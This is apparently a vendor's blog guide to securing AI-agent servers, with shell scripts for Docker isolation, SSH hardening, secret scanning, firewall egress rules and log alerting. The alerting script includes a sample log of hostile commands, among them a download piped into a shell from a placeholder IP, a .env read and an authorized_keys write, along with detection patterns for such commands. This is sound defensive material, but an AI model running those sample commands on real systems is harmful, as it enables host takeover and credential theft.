Last month a founder got hacked because his AI agent had root access to an unsandboxed server. API keys sat in a plaintext .env file. No Docker. No firewall rules. Someone found an exposed port at 4 AM.
Six hours to clean up. Every credential rotated. Production rebuilt from backup.
This happens more often than anyone admits. So here's the security guide I wish every AI agent deployer would read before they connect anything to their business.
Start With Docker. Always.
Your AI agent should never run directly on your host machine. Ever.
Docker containers provide process and filesystem isolation. If your agent gets compromised or starts executing unexpected commands, the damage stays inside the container: your host system, your files and your other services are out of its reach, provided you don't undo that isolation yourself by running the container as root, with --privileged, or with the Docker socket mounted inside it. Containers share the host kernel, so treat them as a strong boundary rather than a perfect one; that is why the rest of this guide still applies.
The basic setup:
- Run your agent inside a Docker container with limited permissions
- Mount only the specific directories the agent needs (not your entire filesystem)
- Set memory and CPU limits so a runaway process can't take down your server
- Use Docker's built-in networking to restrict which services the agent can reach
If Docker feels like overkill for your setup, it's not. The hour you spend configuring it saves you the 6-hour cleanup when something goes wrong.
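The four bullets above, turned into a launcher script. This is an added example for this guide, not OpenClaw's own tooling; the image name, data directory and network name are placeholders, and the agent image is assumed to run as an unprivileged user with write access to /data only. The preflight check exists because the most common way to lose the isolation is a well-meaning flag added later.

```shell
#!/bin/sh
# run-agent.sh: start an AI agent in a locked-down Docker container.
# Added example for this guide, not OpenClaw's own launcher. The image name,
# data directory and network name are placeholders for your own values.
set -u

IMAGE="${AGENT_IMAGE:-example/agent:latest}"   # hypothetical image
DATA_DIR="${AGENT_DATA_DIR:-/srv/agent/data}"   # the only host path the agent gets
NET="${AGENT_NET:-agent-net}"                   # create once: docker network create agent-net

# The hardened `docker run` argument list. Each flag removes a default the
# agent does not need: root, a writable root filesystem, all capabilities,
# privilege escalation, unbounded processes/memory/CPU, the host filesystem.
agent_run_args() {
  printf '%s' \
    "--name agent --restart unless-stopped " \
    "--user 10001:10001 " \
    "--read-only --tmpfs /tmp:rw,noexec,nosuid,size=64m " \
    "--cap-drop=ALL --security-opt=no-new-privileges:true " \
    "--pids-limit=256 --memory=1g --memory-swap=1g --cpus=1.0 " \
    "--network=$NET " \
    "--mount type=bind,src=$DATA_DIR,dst=/data " \
    "$IMAGE"
}

# Refuse an argument list that quietly hands the host back to the agent:
# returns 1 (and names the culprit) if any of these show up.
reject_dangerous_args() {
  a="$1"
  for bad in '--privileged' 'docker.sock' '--cap-add' '--pid=host' \
             '--network=host' '--network host' 'seccomp=unconfined' \
             '--userns=host' 'src=/,' '-v /:'; do
    case "$a" in
      *"$bad"*) printf 'refusing to start: found %s\n' "$bad" >&2; return 1 ;;
    esac
  done
  return 0
}

# Usage: ./run-agent.sh run    start the container (needs Docker access)
#        ./run-agent.sh        print the command that would run
main() {
  args="$(agent_run_args)"
  reject_dangerous_args "$args" || return 1
  case "${1:-}" in
    run) docker run -d $args ;;                 # unquoted on purpose: split into flags
    *)   printf 'docker run -d %s\n' "$args" ;;
  esac
}
main "$@"
```

The data directory on the host must be owned by uid 10001 (or whatever uid your image runs as), otherwise the agent cannot write to it; that failure is the correct one, so fix ownership rather than dropping --user. Add `,readonly` to the mount if the agent only needs to read.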
SSH Hardening
If your agent runs on a remote server (and it probably should), SSH is your front door. Lock it down.
- Disable password authentication. Keys only.
- Change the default SSH port. It removes most of the automated scanning noise from your logs, but it is obscurity, not protection; keys-only authentication is what actually stops the logins.
- Set up fail2ban. After 3 failed login attempts, that IP gets blocked for 24 hours.
- Disable root login over SSH. Use a regular user account with sudo when needed.
- Keep your SSH keys encrypted with a passphrase.
None of this is optional. If you're running an AI agent on a server accessible via SSH with default settings, you're one brute-force attack away from a bad day.
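The SSH checklist as a script that rewrites sshd_config, verifies the result and writes the matching fail2ban jail. This is an added example for this guide, not OpenClaw tooling; the admin user name and the port are placeholders. It puts the managed settings at the top of the file because sshd uses the first value it sees for each keyword, which is how you beat a stray `PasswordAuthentication yes` in an Include'd cloud-init fragment.

```shell
#!/bin/sh
# ssh-harden.sh: apply this guide's SSH settings to an sshd_config and verify them.
# Added example for this guide, not OpenClaw tooling. ADMIN_USER, SSH_PORT and
# the file paths are placeholders for your own values.
set -u

ADMIN_USER="${ADMIN_USER:-deploy}"   # hypothetical non-root user with sudo
SSH_PORT="${SSH_PORT:-2222}"         # any free non-default port

# The directives we manage, one "Key value" per line.
required_directives() {
  cat <<EOF
Port $SSH_PORT
PasswordAuthentication no
KbdInteractiveAuthentication no
PubkeyAuthentication yes
PermitRootLogin no
PermitEmptyPasswords no
MaxAuthTries 3
AllowUsers $ADMIN_USER
EOF
}

# harden_sshd_config IN OUT: write OUT as IN minus any existing (even
# commented-out) setting of a managed key, with our block at the very top.
# sshd takes the FIRST value for each keyword, so the top wins over later
# lines and over Include'd files such as sshd_config.d/*.conf.
harden_sshd_config() {
  in="$1"; out="$2"
  keys="$(required_directives | awk '{print $1}' | tr '\n' '|' | sed 's/|$//')"
  {
    printf '# --- managed by ssh-harden.sh ---\n'
    required_directives
    printf '# --- end managed block ---\n'
    grep -Ev "^[[:space:]]*#?[[:space:]]*($keys)[[:space:]]" "$in" || true
  } > "$out"
}

# audit_sshd_config FILE: print each managed directive whose first
# effective value in FILE differs; return 1 if anything is wrong.
# (Checks the main file only; run `sshd -T` on the host for the merged view.)
audit_sshd_config() {
  f="$1"
  problems="$(required_directives | while read -r key want; do
    got="$(awk -v k="$key" 'tolower($1)==tolower(k) {print $2; exit}' "$f")"
    [ "$got" = "$want" ] || printf 'MISSING %s %s (found: %s)\n' "$key" "$want" "${got:-none}"
  done)"
  [ -z "$problems" ] && return 0
  printf '%s\n' "$problems"
  return 1
}

# write_fail2ban_jail OUT: jail.local matching the guide (3 tries, 24 h ban).
write_fail2ban_jail() {
  cat > "$1" <<EOF
[sshd]
enabled  = true
port     = $SSH_PORT
maxretry = 3
findtime = 10m
bantime  = 24h
EOF
}

# install_sshd_config NEW: validate, back up, install, reload. Keep your
# current session open and test a fresh login before closing it.
install_sshd_config() {
  sshd -t -f "$1" || return 1
  cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
  cp "$1" /etc/ssh/sshd_config
  systemctl reload ssh 2>/dev/null || systemctl reload sshd
}

# Usage: ./ssh-harden.sh plan  [out]   write and audit a candidate config
#        ./ssh-harden.sh apply [new]   install it and the fail2ban jail (root)
case "${1:-}" in
  plan)  harden_sshd_config /etc/ssh/sshd_config "${2:-/tmp/sshd_config.new}"
         audit_sshd_config "${2:-/tmp/sshd_config.new}" ;;
  apply) install_sshd_config "${2:-/tmp/sshd_config.new}" &&
         write_fail2ban_jail /etc/fail2ban/jail.local &&
         systemctl restart fail2ban ;;
esac
```

Before `apply`, confirm your public key is already in the admin user's authorized_keys and that the user can sudo; with PasswordAuthentication off and PermitRootLogin off, a missing key locks you out. Remember to open the new port in the firewall before restarting sshd.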
Credential Management
This is where most people mess up.
API keys in .env files are fine for development. In production, they're a liability. Anyone who gains access to your filesystem can read every API key, every OAuth token, every secret your agent uses.
Better approaches:
- Use encrypted credential storage (OpenClaw's SecretRef system handles this natively)
- Rotate API keys on a schedule. Monthly minimum.
- Use scoped API keys wherever possible. Your email agent doesn't need write access to your billing system.
- Never commit credentials to git. Not even private repos. Use .gitignore religiously.
- Set up alerts for unusual API key usage patterns.
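Two of the bullets above can be enforced rather than remembered: a pre-commit hook that refuses to commit anything that looks like a credential, and a permission check on any .env that still exists. This is an added example for this guide, not OpenClaw's SecretRef system; the pattern list is a starting set of well-known key shapes, and you should extend it with the formats your own providers use.

```shell
#!/bin/sh
# secret-scan.sh: block commits that contain credentials, and check the
# permissions on any plaintext .env that does exist.
# Added example for this guide, not OpenClaw's SecretRef system. The pattern
# list is a starting set, not a complete one.
set -u

# grep -E patterns for common credential shapes (AWS access key id,
# "sk-" style API keys, GitHub tokens, Slack tokens, PEM private keys,
# and a generic KEY=value assignment with a long random-looking value).
secret_patterns() {
  cat <<'EOF'
AKIA[0-9A-Z]{16}
sk-[A-Za-z0-9_-]{20,}
gh[pousr]_[A-Za-z0-9]{36,}
xox[abprs]-[A-Za-z0-9-]{10,}
-----BEGIN [A-Z ]*PRIVATE KEY-----
(api[_-]?key|secret|token|password)[[:space:]]*[=:][[:space:]]*["']?[A-Za-z0-9_/+=-]{16,}
EOF
}

# scan_for_secrets: read text on stdin (a file, or `git diff --cached -U0`),
# print the offending lines to stderr and return 1 if any match.
# Diff "+++ b/path" headers are dropped so file names never trigger a hit.
scan_for_secrets() {
  pat="$(mktemp)"; secret_patterns > "$pat"
  hits="$(grep -v '^+++ ' | grep -E -i -f "$pat" || true)"
  rm -f "$pat"
  [ -z "$hits" ] && return 0
  printf 'possible credential(s) in commit:\n%s\n' "$hits" >&2
  return 1
}

# ensure_gitignore REPO: make sure the usual secret-bearing files are ignored.
ensure_gitignore() {
  gi="$1/.gitignore"; touch "$gi"
  for p in '.env' '.env.*' '*.pem' '*.key'; do
    grep -qxF "$p" "$gi" || printf '%s\n' "$p" >> "$gi"
  done
}

# check_env_file PATH: a plaintext .env is tolerable only while nobody but
# its owner can read it. Returns 1 if it is group- or world-readable.
check_env_file() {
  f="$1"
  [ -e "$f" ] || return 0
  mode="$(stat -c '%a' "$f" 2>/dev/null || stat -f '%Lp' "$f")"
  case "$mode" in
    *00) return 0 ;;                                   # 600, 400, 700: owner only
    *) printf '%s is mode %s; run: chmod 600 %s\n' "$f" "$mode" "$f" >&2; return 1 ;;
  esac
}

# install_hook REPO: run the scan over staged changes on every commit.
install_hook() {
  hook="$1/.git/hooks/pre-commit"
  script="$(cd "$(dirname "$0")" && pwd)/$(basename "$0")"
  printf '#!/bin/sh\n. "%s"\ngit diff --cached -U0 | scan_for_secrets\n' "$script" > "$hook"
  chmod +x "$hook"
  ensure_gitignore "$1"
}

# Usage: ./secret-scan.sh install [repo]   install the hook and .gitignore entries
#        ./secret-scan.sh scan < file      scan arbitrary text
#        ./secret-scan.sh env [path]       check .env permissions
case "${1:-}" in
  install) install_hook "${2:-.}" ;;
  scan)    scan_for_secrets ;;
  env)     check_env_file "${2:-.env}" ;;
esac
```

A hook only protects people who have it installed, so treat it as a seatbelt for your own team; the scheduled rotation in the bullets above is what limits the damage when a key does leak anyway.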
Permission Scoping
Your AI agent should have the minimum permissions needed to do its job. Nothing more.
If the agent reads email and manages calendar, it doesn't need shell access. If it manages your CRM, it doesn't need access to your source code. If it handles customer support, it doesn't need your financial data.
Every extra permission is an extra attack surface. Keep it tight.
OpenClaw supports granular tool permissions. Use them. Disable every tool your agent doesn't actively need. You can always enable them later.
Network Security
Your agent's server should not have every port open. This sounds obvious, but you'd be surprised.
- Close every port except the ones you explicitly need
- Use a firewall (UFW on Ubuntu is straightforward)
- If your agent only communicates with specific services, whitelist those IPs
- Monitor outbound connections. If your agent starts calling IP addresses it shouldn't, that's a red flag.
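The firewall bullets as a rule generator: inbound is SSH from your admin range only, outbound is denied by default and opened per destination from an allowlist. This is an added example for this guide, not OpenClaw tooling; the addresses are documentation ranges standing in for your providers' published IPs, and the SSH port matches the earlier section.

```shell
#!/bin/sh
# agent-firewall.sh: generate UFW rules from an allowlist so the agent host
# accepts only SSH in and can reach only the services it needs out.
# Added example for this guide, not OpenClaw tooling. The port, the admin
# range and the allowlist entries are placeholders for your own values.
set -u

SSH_PORT="${SSH_PORT:-2222}"
ADMIN_CIDR="${ADMIN_CIDR:-203.0.113.0/24}"   # where you administer from (placeholder range)

# "destination port" pairs the agent may reach. Constructed sample;
# replace with the IP ranges your API providers publish.
default_allowlist() {
  cat <<'EOF'
# LLM API endpoints
198.51.100.10 443
198.51.100.0/24 443
# outbound mail relay
192.0.2.25 587
EOF
}

# valid_dest ADDR: dotted IPv4 with optional /prefix, nothing else, so a
# typo or a bare hostname never turns into "allow out to anywhere".
valid_dest() {
  printf '%s' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}(/[0-9]{1,2})?$'
}

# firewall_rules: read the allowlist on stdin, print the ufw commands.
# Order matters: defaults first, explicit allows, then enable.
firewall_rules() {
  printf 'ufw --force reset\n'
  printf 'ufw default deny incoming\n'
  printf 'ufw default deny outgoing\n'
  printf 'ufw logging low\n'
  printf 'ufw allow in from %s to any port %s proto tcp\n' "$ADMIN_CIDR" "$SSH_PORT"
  printf 'ufw allow out to any port 53 proto udp\n'    # DNS; pin to your resolver if you can
  printf 'ufw allow out to any port 123 proto udp\n'   # NTP
  while read -r dest port; do
    case "$dest" in ''|'#'*) continue ;; esac         # skip blanks and comments
    valid_dest "$dest" || { printf 'bad allowlist entry: %s\n' "$dest" >&2; return 1; }
    printf 'ufw allow out to %s port %s proto tcp\n' "$dest" "$port"
  done
  printf 'ufw --force enable\n'
}

# Usage: ./agent-firewall.sh          print the rules (dry run)
#        ./agent-firewall.sh apply    execute them (root)
main() {
  case "${1:-}" in
    apply) default_allowlist | firewall_rules | sh -e ;;
    *)     default_allowlist | firewall_rules ;;
  esac
}
main "$@"
```

Two caveats a practitioner will hit. Unattended OS updates need their own outbound entries (the mirror's addresses on 80/443), or they silently stop. And Docker bypasses these host rules for containers: published ports are opened directly in iptables, and container traffic is forwarded rather than originated, so the "deny outgoing" default does not apply to the agent container. Bind published ports to 127.0.0.1, and apply egress filtering in the DOCKER-USER chain or on the agent's Docker network as well.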
Monitoring and Logging
You can't secure what you can't see.
- Log every command your agent executes
- Log every API call it makes
- Set up alerts for unusual patterns (high volume API calls, new IP connections, file system changes)
- Review logs weekly at minimum
- Keep logs for at least 90 days
When something goes wrong (and eventually something will), logs are the difference between a 30-minute fix and a 6-hour mystery.
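The "unusual patterns" bullet as detection logic you can run over the logs from the previous bullets. This is an added example for this guide, not OpenClaw's logging; the log format is a constructed one (timestamp, event kind, detail) and the sample log is made up to exercise each rule, so adapt the field split to whatever your agent actually emits. It fires on an API-call burst, a connection to a host outside the expected set, a piped-to-shell download or a read of credential files, and a write outside the agent's data directory.

```shell
#!/bin/sh
# agent-alerts.sh: run this guide's "unusual pattern" checks over an agent
# event log. Added example for this guide, not OpenClaw's logging. The log
# format is constructed: "ISO-timestamp kind detail", kind in api/net/exec/fs.
set -u

API_PER_MINUTE="${API_PER_MINUTE:-20}"                                  # burst threshold
KNOWN_HOSTS="${KNOWN_HOSTS:-198.51.100.10 198.51.100.11 192.0.2.25}"   # expected destinations

# check_log FILE: print one ALERT line per finding; return 1 if there were any.
check_log() {
  alerts="$(awk -v limit="$API_PER_MINUTE" -v known="$KNOWN_HOSTS" '
    BEGIN { n = split(known, k, " "); for (i = 1; i <= n; i++) ok[k[i]] = 1 }
    $2 == "api" {
      minute = substr($1, 1, 16)              # 2024-05-01T04:13
      if (++calls[minute] == limit + 1)        # fire once per minute, not per call
        printf "ALERT rate   %s more than %d api calls in one minute\n", minute, limit
    }
    $2 == "net" {
      split($3, hp, ":")                      # detail is host:port
      if (!(hp[1] in ok))
        printf "ALERT egress %s connection to unknown host %s\n", $1, $3
    }
    $2 == "exec" {
      cmd = $0; sub(/^[^ ]+ exec /, "", cmd)
      if (cmd ~ /(curl|wget)[^|]*[|][ ]*(sh|bash)/ || cmd ~ /\.ssh|\.env|\/etc\/shadow|sudo /)
        printf "ALERT exec   %s suspicious command: %s\n", $1, cmd
    }
    $2 == "fs" && $3 == "write" && $4 !~ /^\/data\// {
      printf "ALERT fs     %s write outside /data: %s\n", $1, $4
    }
  ' "$1")"
  [ -z "$alerts" ] && return 0
  printf '%s\n' "$alerts"
  return 1
}

# sample_log: a constructed log that trips every rule once (twice for exec).
sample_log() {
  cat <<'EOF'
2024-05-01T04:11:58Z api chat.completions ok
2024-05-01T04:12:00Z net 198.51.100.10:443
2024-05-01T04:12:01Z exec ls /data/inbox
2024-05-01T04:12:02Z fs write /data/inbox/summary.txt
2024-05-01T04:12:03Z net 203.0.113.77:4444
2024-05-01T04:12:04Z exec curl -s http://203.0.113.77/x.sh | sh
2024-05-01T04:12:05Z exec cat /home/deploy/.env
2024-05-01T04:12:06Z fs write /home/deploy/.ssh/authorized_keys
EOF
  i=0                                          # burst of 25 api calls in one minute
  while [ "$i" -lt 25 ]; do
    printf '2024-05-01T04:13:%02dZ api chat.completions ok\n' "$i"
    i=$((i + 1))
  done
}

# Usage: ./agent-alerts.sh /var/log/agent/events.log   (exit 1 if anything fired)
#        ./agent-alerts.sh                              (run against the sample)
if [ -n "${1:-}" ]; then
  check_log "$1"
else
  f="$(mktemp)"; sample_log > "$f"; check_log "$f" || true; rm -f "$f"
fi
```

Run it from cron every few minutes with the real log path and have a non-zero exit send the notification; the exit status is the alert signal, the printed lines are the evidence for the person who gets paged.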
The Update Discipline
Keep everything updated. OpenClaw, your OS, Docker, Node.js, every dependency.
Security patches exist for a reason. Once a patch is public, the bug it fixes is public too; attackers read changelogs and diff releases, so the window between a fix shipping and exploitation of unpatched systems is short.
Set up automatic security updates for your OS. For OpenClaw, check for updates weekly. For Docker images, rebuild monthly.
What We Do Differently
When OpenClaw Setup deploys an agent, roughly 40% of our time goes to security configuration. That's not overhead. That's the job.
Every deployment gets: Docker sandboxing, SSH hardening, encrypted credential storage, permission scoping, firewall configuration, fail2ban, and monitoring setup.
It's not glamorous. Clients don't get excited about firewall rules. But it's the reason our clients sleep at night.
If you've already deployed an agent and skipped the security steps, it's not too late. Go back and do them now. Today. Before something happens.
And if you want someone who's done this 50+ times to handle it for you: book a call.
OpenClaw Setup deploys, configures, and secures AI agents for businesses. One-time $999 setup. Security included. Get started.